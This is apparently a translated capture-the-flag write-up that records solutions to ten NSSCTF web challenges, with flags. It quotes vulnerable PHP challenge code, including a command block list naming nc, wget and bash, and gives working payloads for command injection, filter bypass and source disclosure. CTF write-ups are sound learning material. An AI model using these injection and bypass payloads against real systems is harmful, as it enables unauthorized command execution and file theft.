NSSCTF's Web chapter brushing record [12]
-
- [NCTF 2018] Check-in questions:
- [Crane City Cup 2021] EasyP:
- [NSSCTF 2022 Spring Recruit]ezgame:
- [GXYCTF 2019]Ping Ping Ping:
- [SWPUCTF 2021 Freshman Competition] finalrce:
- [NISACTF 2022]checkin:
- [UUCTF 2022 Freshman Competition] websign:
- [GDOUCTF 2023]hate eat snake:
- [HNCTF 2022 Week1]2048:
- [HDCTF 2023]Welcome To HDCTF 2023:
NSSCTF platform: https://www.nssctf.cn/
PS: Remember flag
to change everything toNSSCTF
[NCTF 2018] Check-in questions:
Opening is a search.php
look at the source code, but I can't find it flag,
. Finally, index.php
I found it in the response header!
NSSCTF{w3lc0m3_t0_nctf2018hhhhhhhhhhhh}
[Crane City Cup 2021] EasyP:
<?php
include 'utils.php';
if (isset($_POST['guess'])) {
$guess = (string) $_POST['guess'];
if ($guess === $secret) {
$message = 'Congratulations! The flag is: ' . $flag;
} else {
$message = 'Wrong. Try Again';
}
}
if (preg_match('/utils\.php\/*$/i', $_SERVER['PHP_SELF'])) {
exit("hacker :)");
}
if (preg_match('/show_source/', $_SERVER['REQUEST_URI'])){
exit("hacker :)");
}
if (isset($_GET['show_source'])) {
highlight_file(basename($_SERVER['PHP_SELF']));
exit();
}else{
show_source(__FILE__);
}
?>
Analyze the code $_SERVE[‘PHP_SELF’]
The path of the called script
$_SERVER[‘REQUEST_URI’]
obtains the current URI, that is, the complete address path after the domain name
basename
function: Returns the file name part of the path.
Now you need to bypass preg_match('/utils\.php\/*$/i', $_SERVER['PHP_SELF']
and regularize as long as php\
you add a non- ascll
code at the end. For example, Chinese characters preg_match
cannot be directly input due to regular matching, show_source=‘’
so you can show_source
change it to show[source
bypass preg_match
regularity. Add a character that is not in the table index.php/utils.php
after ascii
(many are fine)
payload:/index.php/utils.php/巧克力?show[source=1
NSSCTF{9ce4af3e-811f-49cd-a8f3-544efa897fb9}
[NSSCTF 2022 Spring Recruit]ezgame:
65
You flag
are given points for playing the game (too lazy to play) js
so let's look for it and js/preload.js
find it in FLAG
.
NSSCTF{c0700f5b-604f-4b8f-b017-4be822fb5de6}
[GXYCTF 2019]Ping Ping Ping:
This question has been mentioned before and you can refer to the link : https://blog.csdn.net/Aluxian_/article/details/130053100?spm=1001.2014.3001.5501
Payload:?ip=127.0.0.1;cat$IFS$9`ls`
NSSCTF{8117affa-f16d-4085-b644-696ae9b83a2c}
[SWPUCTF 2021 Freshman Competition] finalrce:
<?php
highlight_file(__FILE__);
if(isset($_GET['url']))
{
$url=$_GET['url'];
if(preg_match('/bash|nc|wget|ping|ls|cat|more|less|phpinfo|base64|echo|php|python|mv|cp|la|\-|\*|\"|\>|\<|\%|\$/i',$url))
{
echo "Sorry,you can't use this.";
}
else
{
echo "Can you see anything?";
exec($url);
}
}
preg_match
The function is used to perform a regular expression match. Here you can see that basically a lot of commands are filtered, cat,ls
which cannot be used. You can use tee
the command
Since ls
regular expressions are filtered, we also need to bypass the escape character preg_match
with a backslash(\)
The function here tee
is to read from standard input, then write to standard output and files Payload:?url=l\s / |tee 1.txt
, and then access 1.txt
to seeflllllaaaaaaggggggg
tac
It is not filtered and then directly constructed. Payload:?url=tac /flllll\aaaaaaggggggg | tee 9.txt (
Remember | followed by a space) in access9.txt
NSSCTF{9dccd221-4cd1-41f7-9feb-3c463839eb88}
[NISACTF 2022]checkin:
Tip: Try to copy the source code to see ->010editor
Recognize Unicode
the special characters, copy them to VScode
the middle, copy them down and URLencode
encode them
Payload:?ahahahaha=jitanglailo&%E2%80%AE%E2%81%A6Ugeiwo%E2%81%A9%E2%81%A6cuishiyuan=%E2%80%AE%E2%81%A6 Flag!%E2%81%A9%E2%81%A6N1SACTF
NSSCTF{5359287b-d34e-4df8-ac95-1670f011cf2c}
[UUCTF 2022 Freshman Competition] websign:
[GDOUCTF 2023]hate eat snake:
Pass to get the flag or first G a few times and then click cancel, wait for about 60 seconds, and then press the space to get the flag
[HNCTF 2022 Week1]2048:
It's a classic game. Just F12
check the source code to find it js
, go in and check alert()
the output, copy it to the console and run it.
NSSCTF{53160c888e25c3f828b23e316a7ae083}
[HDCTF 2023]Welcome To HDCTF 2023:
If you play the game normally, you will give FLAG, or go to js to find a JSFuck
codec and decode it.
NSSCTF{We13ome_t@_HDCTF_2o23}